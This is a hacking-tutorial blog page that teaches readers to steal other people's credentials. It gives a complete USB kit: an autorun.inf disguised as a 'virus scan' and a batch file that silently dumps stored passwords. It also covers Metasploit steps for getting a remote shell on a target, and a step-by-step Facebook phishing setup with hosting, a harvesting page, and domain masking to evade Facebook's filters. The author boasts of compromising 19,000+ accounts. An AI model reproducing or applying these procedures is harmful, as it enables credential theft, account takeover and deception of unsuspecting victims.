How to Sniff/Hack Passwords Using USB Drive

How to Sniff/Hack Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.


MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.


How to Hack a computer using Metasploit


How to Hack a computer using Metasploit 


Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.

1: help (show the commands.)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine.)

Note: To hack a computer using Metasploit first you should have the enough information of the target ­­including
1: IP address
2: Open Ports
3: services running
4: Version of software running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.

Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.

To choose an exploit following command is there:

Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]

Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.

Show payloads

Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.

RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)

Now the Last step is to type the following command and Launch attack to the computer.

exploit

After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.

How to make a Phisher or Fake Pages

How to make a Phisher or Fake Page

Phishers are fake pages which are intentionally made by hackers to steal the critical information like identity details, usernames, passwordsIP address and other such stuff. As i mentioned intentional, which clearly means its illegal and its a cyber crime. Phishing is basically a social engineering technique to hack username and passwords by deceiving the legitimate users. Phishers are sent normally using spam or forged mails.

How to Know the IP address of a person on Facebook.


How to Know the IP address of a person on Facebook.


This technique works when you are chatting with that person. The first demand of operation is to close all of the website and Messengers that you are using, even clean History and delete Cookies as precaution. Now start chatting with that person.

The first thing you do is to open start->run->cmd.exe now in it type following command:

netstat –an


and wait and watch the foreign address will be the IP address.

Hack Facebook Or Any Account By Phishing Method Easily



Hack Facebook Or Any Account By Phishing Method Easily



Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public

Facebook Phisher


Please Note: Phishing is legally offensive. I am not responsible for any action done by you.
Hacking Facebook password:
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.
1. First of all download from here:
2. The downloaded file contains:
  • Index.html
  • write.php
If you want Fake login page of all the top sites then download it from here:-

3. Upload both files to any of these free web host sites:
4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.
5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.

If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.
6. Now, open passes.txt to get hacked Facebook id and password as shown.


Hope this tutorial was useful for you.

If you are creating the phisher in  http://www.000webhost.com then follow this tutorial:

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)
Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now download the phisher (http://www.mediafire.com/?klq1vak76bouzrw ) .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.


Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.



Step 6: Now Click on the Public_html.


Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.


Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html


If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s
PS:> If www.p4o.net didn’t worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com
=============================================================
The Input Data (Email and Password) will look like following:


UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it
HOW TO FIND YOUR USERNAME?
Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website
 
                                                                                                             By-Ayush Singh 





Hack Passwords By Stealing Cookies


Hack Passwords By Stealing Cookies

How to Crack a Wi-Fi Network’s WEP Password with BackTrack


How to Crack a Wi-Fi Network’s WEP Password with BackTrack

Hack FACEBOOK PASSWORDS USING KEYLOGGER


Hack FACEBOOK PASSWORDS USING KEYLOGGER

Today i will disclose you how i hacked 19000+ accounts, its so easy that anyone can do it. On my website you will never get any infected tool. If you have any doubt or feel something suspicious always test the link or file with virus total website before downloading. Never believe any website including mine also, always scan download links with virus total website or any such website before downloading it. Download it only when it does not have any virus.

Page List

Powered by Blogger.

Copyright © / Ayush's Desk

Template by : Urang-kurai / powered by :blogger